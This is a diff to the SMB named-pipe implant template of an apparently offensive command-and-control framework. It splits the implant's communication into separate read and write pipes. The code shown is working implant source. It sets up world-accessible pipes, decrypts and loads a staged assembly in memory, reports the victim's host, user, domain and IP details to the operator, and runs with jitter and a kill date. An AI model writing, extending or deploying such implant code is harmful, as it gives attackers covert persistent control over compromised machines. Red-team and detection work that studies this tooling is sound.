--- a/Covenant/Data/ImplantTemplates/GruntSMB.yaml
+++ b/Covenant/Data/ImplantTemplates/GruntSMB.yaml
@@ -74,14 +74,19 @@
 
                     string transformedResponse = MessageTransform.Transform(Encoding.UTF8.GetBytes(Stage0Body));
                     NamedPipeServerStream pipe = null;
+                    NamedPipeServerStream pipeWrite = null;
                     string Stage0Response = "";
                     PipeSecurity ps = new PipeSecurity();
                     ps.AddAccessRule(new PipeAccessRule(new SecurityIdentifier(WellKnownSidType.WorldSid, null), PipeAccessRights.FullControl, AccessControlType.Allow));
+                    // Read pipe
                     pipe = new NamedPipeServerStream(PipeName, PipeDirection.InOut, NamedPipeServerStream.MaxAllowedServerInstances, PipeTransmissionMode.Byte, PipeOptions.Asynchronous, 1024, 1024, ps);
+                    // WritePipe
+                    pipeWrite = new NamedPipeServerStream(PipeName + "w", PipeDirection.InOut, NamedPipeServerStream.MaxAllowedServerInstances, PipeTransmissionMode.Byte, PipeOptions.Asynchronous, 1024, 1024, ps);
                     pipe.WaitForConnection();
+                    pipeWrite.WaitForConnection();
                     System.Threading.Thread.Sleep(5000);
                     var Stage0Bytes = Encoding.UTF8.GetBytes(String.Format(ProfileWriteFormat, transformedResponse, GUID));
-                    Write(pipe, Stage0Bytes);
+                    Write(pipeWrite, Stage0Bytes);
                     Stage0Response = Encoding.UTF8.GetString(Read(pipe));
                     string extracted = Parse(Stage0Response, ProfileReadFormat)[0];
                     extracted = Encoding.UTF8.GetString(MessageTransform.Invert(extracted));
@@ -112,7 +117,7 @@
 
                     string Stage1Response = "";
                     var Stage1Bytes = Encoding.UTF8.GetBytes(String.Format(ProfileWriteFormat, transformedResponse, GUID));
-                    Write(pipe, Stage1Bytes);
+                    Write(pipeWrite, Stage1Bytes);
                     Stage1Response = Encoding.UTF8.GetString(Read(pipe));
                     extracted = Parse(Stage1Response, ProfileReadFormat)[0];
                     extracted = Encoding.UTF8.GetString(MessageTransform.Invert(extracted));
@@ -140,7 +145,7 @@
 
                     string Stage2Response = "";
                     var Stage2Bytes = Encoding.UTF8.GetBytes(String.Format(ProfileWriteFormat, transformedResponse, GUID));
-                    Write(pipe, Stage2Bytes);
+                    Write(pipeWrite, Stage2Bytes);
                     Stage2Response = Encoding.UTF8.GetString(Read(pipe));
                     extracted = Parse(Stage2Response, ProfileReadFormat)[0];
                     extracted = Encoding.UTF8.GetString(MessageTransform.Invert(extracted));
@@ -153,7 +158,7 @@
                     SessionKey.IV = Convert.FromBase64String(iv64str);
                     byte[] DecryptedAssembly = SessionKey.CreateDecryptor().TransformFinalBlock(messageBytes, 0, messageBytes.Length);
                     Assembly gruntAssembly = Assembly.Load(DecryptedAssembly);
-                    gruntAssembly.GetTypes()[0].GetMethods()[0].Invoke(null, new Object[] { GUID, SessionKey, pipe, PipeName });
+                    gruntAssembly.GetTypes()[0].GetMethods()[0].Invoke(null, new Object[] { GUID, SessionKey, pipe, pipeWrite, PipeName });
                 }
                 catch (Exception e) { Console.Error.WriteLine(e.Message); }
             }
@@ -187,7 +192,7 @@
                     totalReadBytes += readBytes;
                 } while (totalReadBytes < size.Length && readBytes != 0);
                 int len = (size[0] << 24) + (size[1] << 16) + (size[2] << 8) + size[3];
-                
+
                 byte[] buffer = new byte[1024];
                 using (var ms = new MemoryStream())
                 {
@@ -262,6 +267,7 @@
             // {{REPLACE_PROFILE_MESSAGE_TRANSFORM}}
         }
     }
+
   ExecutorCode: |
     using System;
     using System.Net;
@@ -282,7 +288,7 @@
     {
         class Grunt
         {
-            public static void Execute(string GUID, Aes SessionKey, NamedPipeServerStream ServerPipe = null, string PipeName = null)
+            public static void Execute(string GUID, Aes SessionKey, NamedPipeServerStream ServerPipe = null, NamedPipeServerStream ServerPipeWrite = null, string PipeName = null)
             {
                 try
                 {
@@ -290,7 +296,7 @@
                     int Jitter = Convert.ToInt32(@"{{REPLACE_JITTER_PERCENT}}");
                     int ConnectAttempts = Convert.ToInt32(@"{{REPLACE_CONNECT_ATTEMPTS}}");
                     DateTime KillDate = DateTime.FromBinary(long.Parse(@"{{REPLACE_KILL_DATE}}"));
-            
+
                     string ProfileReadFormat = @"{{REPLACE_PROFILE_READ_FORMAT}}".Replace(Environment.NewLine, "\n");
                     string ProfileWriteFormat = @"{{REPLACE_PROFILE_WRITE_FORMAT}}".Replace(Environment.NewLine, "\n");
 
@@ -324,7 +330,7 @@
 
                     string RegisterBody = @"{ ""integrity"": " + Integrity + @", ""process"": """ + Process + @""", ""userDomainName"": """ + UserDomainName + @""", ""userName"": """ + UserName + @""", ""delay"": " + Convert.ToString(Delay) + @", ""jitter"": " + Convert.ToString(Jitter) + @", ""connectAttempts"": " + Convert.ToString(ConnectAttempts) + @", ""status"": 0, ""ipAddress"": """ + IPAddress + @""", ""hostname"": """ + Hostname + @""", ""operatingSystem"": """ + OperatingSystem + @""" }";
                     IMessenger baseMessenger = null;
-                    baseMessenger = new SMBMessenger(ServerPipe, PipeName);
+                    baseMessenger = new SMBMessenger(ServerPipe, ServerPipeWrite, PipeName);
                     baseMessenger.Identifier = GUID;
                     TaskingMessenger messenger = new TaskingMessenger
                     (
@@ -717,6 +723,7 @@
         public class TaskingMessenger
         {
             private object _UpstreamLock = new object();
+            private object _UpstreamLockW = new object();
             private IMessenger UpstreamMessenger { get; set; }
             private object _MessageQueueLock = new object();
             private Queue<string> MessageQueue { get; } = new Queue<string>();
@@ -749,7 +756,7 @@
                     return null;
                 }
                 GruntEncryptedMessage gruntMessage = null;
-                if (readMessage.Type == MessageType.Read) 
+                if (readMessage.Type == MessageType.Read)
                 {
                     gruntMessage = this.Profile.ParseReadFormat(readMessage.Message);
                 }
@@ -793,7 +800,7 @@
             {
                 try
                 {
-                    lock (_UpstreamLock)
+                    lock (_UpstreamLockW)
                     {
                         lock (_MessageQueueLock)
                         {
@@ -896,6 +903,14 @@
                 set { lock (this._PipeLock) { this._Pipe = value; } }
             }
 
+            private object _PipeWriteLock = new object();
+            private PipeStream _PipeWrite;
+            private PipeStream PipeWrite
+            {
+                get { lock (this._PipeWriteLock) { return this._PipeWrite; } }
+                set { lock (this._PipeWriteLock) { this._PipeWrite = value; } }
+            }
+
             protected object _IsConnectedLock = new object();
             private bool _IsConnected;
             public bool IsConnected
@@ -912,9 +927,10 @@
                 this.InitializePipe();
             }
 
-            public SMBMessenger(PipeStream Pipe, string Pipename)
+            public SMBMessenger(PipeStream Pipe, PipeStream PipeWrite, string Pipename)
             {
                 this.Pipe = Pipe;
+                this.PipeWrite = PipeWrite;
                 this.PipeName = Pipename;
                 this.IsServer = true;
                 if (Pipe != null && Pipe.IsConnected)
@@ -1059,12 +1075,12 @@
                 size[1] = (byte)(compressed.Length >> 16);
                 size[2] = (byte)(compressed.Length >> 8);
                 size[3] = (byte)compressed.Length;
-                this.Pipe.Write(size, 0, size.Length);
+                this.PipeWrite.Write(size, 0, size.Length);
                 var writtenBytes = 0;
                 while (writtenBytes < compressed.Length)
                 {
                     int bytesToWrite = Math.Min(compressed.Length - writtenBytes, 1024);
-                    this.Pipe.Write(compressed, writtenBytes, bytesToWrite);
+                    this.PipeWrite.Write(compressed, writtenBytes, bytesToWrite);
                     writtenBytes += bytesToWrite;
                 }
             }
